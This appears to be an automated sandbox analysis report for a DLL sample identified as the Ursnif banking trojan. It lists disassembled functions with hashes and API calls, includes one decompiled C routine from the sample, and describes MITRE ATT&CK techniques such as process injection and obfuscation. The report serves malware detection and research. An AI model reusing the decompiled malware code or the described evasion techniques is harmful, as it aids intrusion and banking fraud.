Uniqueness Score: -1.00%

Function 6E1D4FC0, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5129660d8727a8c89322bc5d8044a2a813c67d685b2d9b2b1cf538890da326
Instruction ID: 53176e92690e5092eecc611a7ee0832e17907f2137c66bbb0a36fd55edcc0ae9
Opcode Fuzzy Hash: 7d5129660d8727a8c89322bc5d8044a2a813c67d685b2d9b2b1cf538890da326
Instruction Fuzzy Hash: 84313E7061010DEFDB54DFE8D854BDE37B9EF44314F208928E9159B294DB70AE88EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D23F0, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 821d311e9f7d69a52a2b56d9b99727e6cf36b92138f4fa954b92b2ae2c04f870
Instruction ID: 2606e59860a509d8730f5a6f96b71d7524be7e06b266f64a5b8c40c2ea76ec6a
Opcode Fuzzy Hash: 821d311e9f7d69a52a2b56d9b99727e6cf36b92138f4fa954b92b2ae2c04f870
Instruction Fuzzy Hash: E3315270600109EFDB55DFE8D854FDE37B9AF44314F208928E8259B294EB30ADC8EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D5100, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16af6ccf4b36449eeebb8817189dae0e95d9750188127c6110057b86ea801ba
Instruction ID: 1c0963fc61d07a489ed10f1ad390dd8630789bff3f10f9870b45bc91c82af1b3
Opcode Fuzzy Hash: b16af6ccf4b36449eeebb8817189dae0e95d9750188127c6110057b86ea801ba
Instruction Fuzzy Hash: 91312F70A14109EFDB44DFF8D854BDE77BAEF44358F208968E4159B294DB30AD88EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E161CDD, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E161CDD() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e164130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e16413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e16412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e164128 = _t5;
						 *0x6e164130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e164124 = _t6;
						if(_t6 == 0) {
							 *0x6e164124 =  *0x6e164124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E161243,747863F0), ref: 6E161CEC
GetVersion.KERNEL32 ref: 6E161CFB
GetCurrentProcessId.KERNEL32 ref: 6E161D17
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E161D30

Memory Dump Source

Source File: 00000003.00000002.592198614.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000003.00000002.592177091.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592224032.000000006E163000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.592233249.000000006E165000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.592246943.000000006E166000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 2f86b238b041ebd2d9ff746eda89a166c1bad3e838c8e686dd98db39f4fdf0cb
Instruction ID: 47aa81a20c76338c8d46dec483c201387ddc0319f4d9c518c2e8ba316dee30ad
Opcode Fuzzy Hash: 2f86b238b041ebd2d9ff746eda89a166c1bad3e838c8e686dd98db39f4fdf0cb
Instruction Fuzzy Hash: 43F08C70694B119BEFC15BB8A82D7A93BB0B757722F20C115E685CA1C4D370A08BBB08

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A49F0, Relevance: 6.0, APIs: 4, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(6E1A48F7,00000000,00000800,?,?,6E1A48F7,00000000), ref: 6E1A49FF
GetLastError.KERNEL32(?,?,6E1A48F7), ref: 6E1A4A13
_wcsncmp.LIBCMTD ref: 6E1A4A29
LoadLibraryExW.KERNEL32(6E1A48F7,00000000,00000000,?,6E1A48F7), ref: 6E1A4A3D

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: LibraryLoad$ErrorLast_wcsncmp
String ID:
API String ID: 4169583555-0
Opcode ID: dc8cabc7417da57cf35f6270321f71716a8af500c68ff4afca152f40fa79eb17
Instruction ID: 9fa51e637286ed992c005ef3243150dc8f63224047b5aa246116710bc38cc260
Opcode Fuzzy Hash: dc8cabc7417da57cf35f6270321f71716a8af500c68ff4afca152f40fa79eb17
Instruction Fuzzy Hash: 08F03078A44318FBDB50DEE8DC59F6D37B89B05700F208414FA0A9B285DA719980A7D4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D6E60, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?), ref: 6E1D6E93

Strings

z, xrefs: 6E1D7167
, xrefs: 6E1D6F64

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Info
String ID: $z
API String ID: 1807457897-2251613814
Opcode ID: 754a93b717b4ab184f6aa1e1a908077dcd626a79b47c5c2f481bfec217762b5e
Instruction ID: f3f123b37a80a18fdc7b8008c8f4118bec3570eedefaedc3c69d8e82b14fe583
Opcode Fuzzy Hash: 754a93b717b4ab184f6aa1e1a908077dcd626a79b47c5c2f481bfec217762b5e
Instruction Fuzzy Hash: BAA11A70A4825C9FDB26CF89C891BE9BB71EB45304F0481D9E94D5B2C2C278AED5DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A9370, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175timeCOMMON

Download Yara Rule

APIs

std::_Timevec::_Timevec.LIBCPMTD ref: 6E1A9444
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1A948D

Strings

, xrefs: 6E1A940F

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: TimevecTimevec::_std::_
String ID:
API String ID: 4219598475-3916222277
Opcode ID: 5bf37c226028f2c5c3d6a56b1968b0858f684726df023e28cca1bec28f0c10da
Instruction ID: be243acf960b640b9411a3ea02b6a1da5c9ca046078b2202efae4ec4a591f706
Opcode Fuzzy Hash: 5bf37c226028f2c5c3d6a56b1968b0858f684726df023e28cca1bec28f0c10da
Instruction Fuzzy Hash: C3711CB8E00209DFCB04DFE8D891AEEB7B5BF48304F204559D615BB395DB35A981CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19055A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

OpenMutexW.KERNEL32(001F0001,00000001,C:\Windows), ref: 6E19056E
GetWindowsDirectoryW.KERNEL32(C:\Windows,00000649), ref: 6E1905CD

Strings

C:\Windows, xrefs: 6E190561, 6E190566, 6E1905CC

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: DirectoryMutexOpenWindows
String ID: C:\Windows
API String ID: 3115804697-2661751657
Opcode ID: 777d2f3d7c0add68d8d11ea0db1e36f0d6c1db07b109f8241b3e327be5077e90
Instruction ID: 579d8ba27c4a60d35e754605837b006bd7c50cd9a6f89951894e7b7671c4bdea
Opcode Fuzzy Hash: 777d2f3d7c0add68d8d11ea0db1e36f0d6c1db07b109f8241b3e327be5077e90
Instruction Fuzzy Hash: 4D51D471904A688FDB148F59C6583A537B3F74A320F156029ED589F340E3B90BA9EBB4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A3490, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E1A34E8
DName::DName.LIBVCRUNTIMED ref: 6E1A34F7

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

Strings

A, xrefs: 6E1A34A6

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name$Name::$Node::makeStatus
String ID: A
API String ID: 3739413223-3554254475
Opcode ID: cc205419bfa92c23ec6ea6be3c1222eb5c27b847dd855f306cd4a8062f0c41b8
Instruction ID: 1204f80260488a21b4bd70b4f991598af8e7b8f7a954230115db205612517f46
Opcode Fuzzy Hash: cc205419bfa92c23ec6ea6be3c1222eb5c27b847dd855f306cd4a8062f0c41b8
Instruction Fuzzy Hash: 43014B74905148FFCB02DFA8D85ABEC7BA5AB42704F148099EA485B391C771AEC1EBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E194020, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E19406E
___vcrt_getptd.LIBVCRUNTIMED ref: 6E194082

Strings

csm, xrefs: 6E194039

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: ___vcrt_getptd
String ID: csm
API String ID: 984050374-1018135373
Opcode ID: a79881c50edc9e5e37fc0e26bcb80cca223ba5c288d7f2d7cdab504985599886
Instruction ID: a08172d9946653a2261dd7c9c4201504c7d677aa8df50f58a5f8299e9a7cc53c
Opcode Fuzzy Hash: a79881c50edc9e5e37fc0e26bcb80cca223ba5c288d7f2d7cdab504985599886
Instruction Fuzzy Hash: 1D01E538A00208EFCB08CFA5C1908ADBBB6BF54205B6489A8C9595F315D771DF82FBD1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 609a460e94791.tiff.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 980 Parent PID: 5752

General

Chronological Activities

Function 6E161237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Function 6E161F56, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Function 6E16179C, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6E1610E8, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Function 6E16173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6E161CDD, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Function 6E1617FA, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6E1623A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Function 6E162184, Relevance: .1, Instructions: 77
COMMONCrypto

Function 6E161352, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON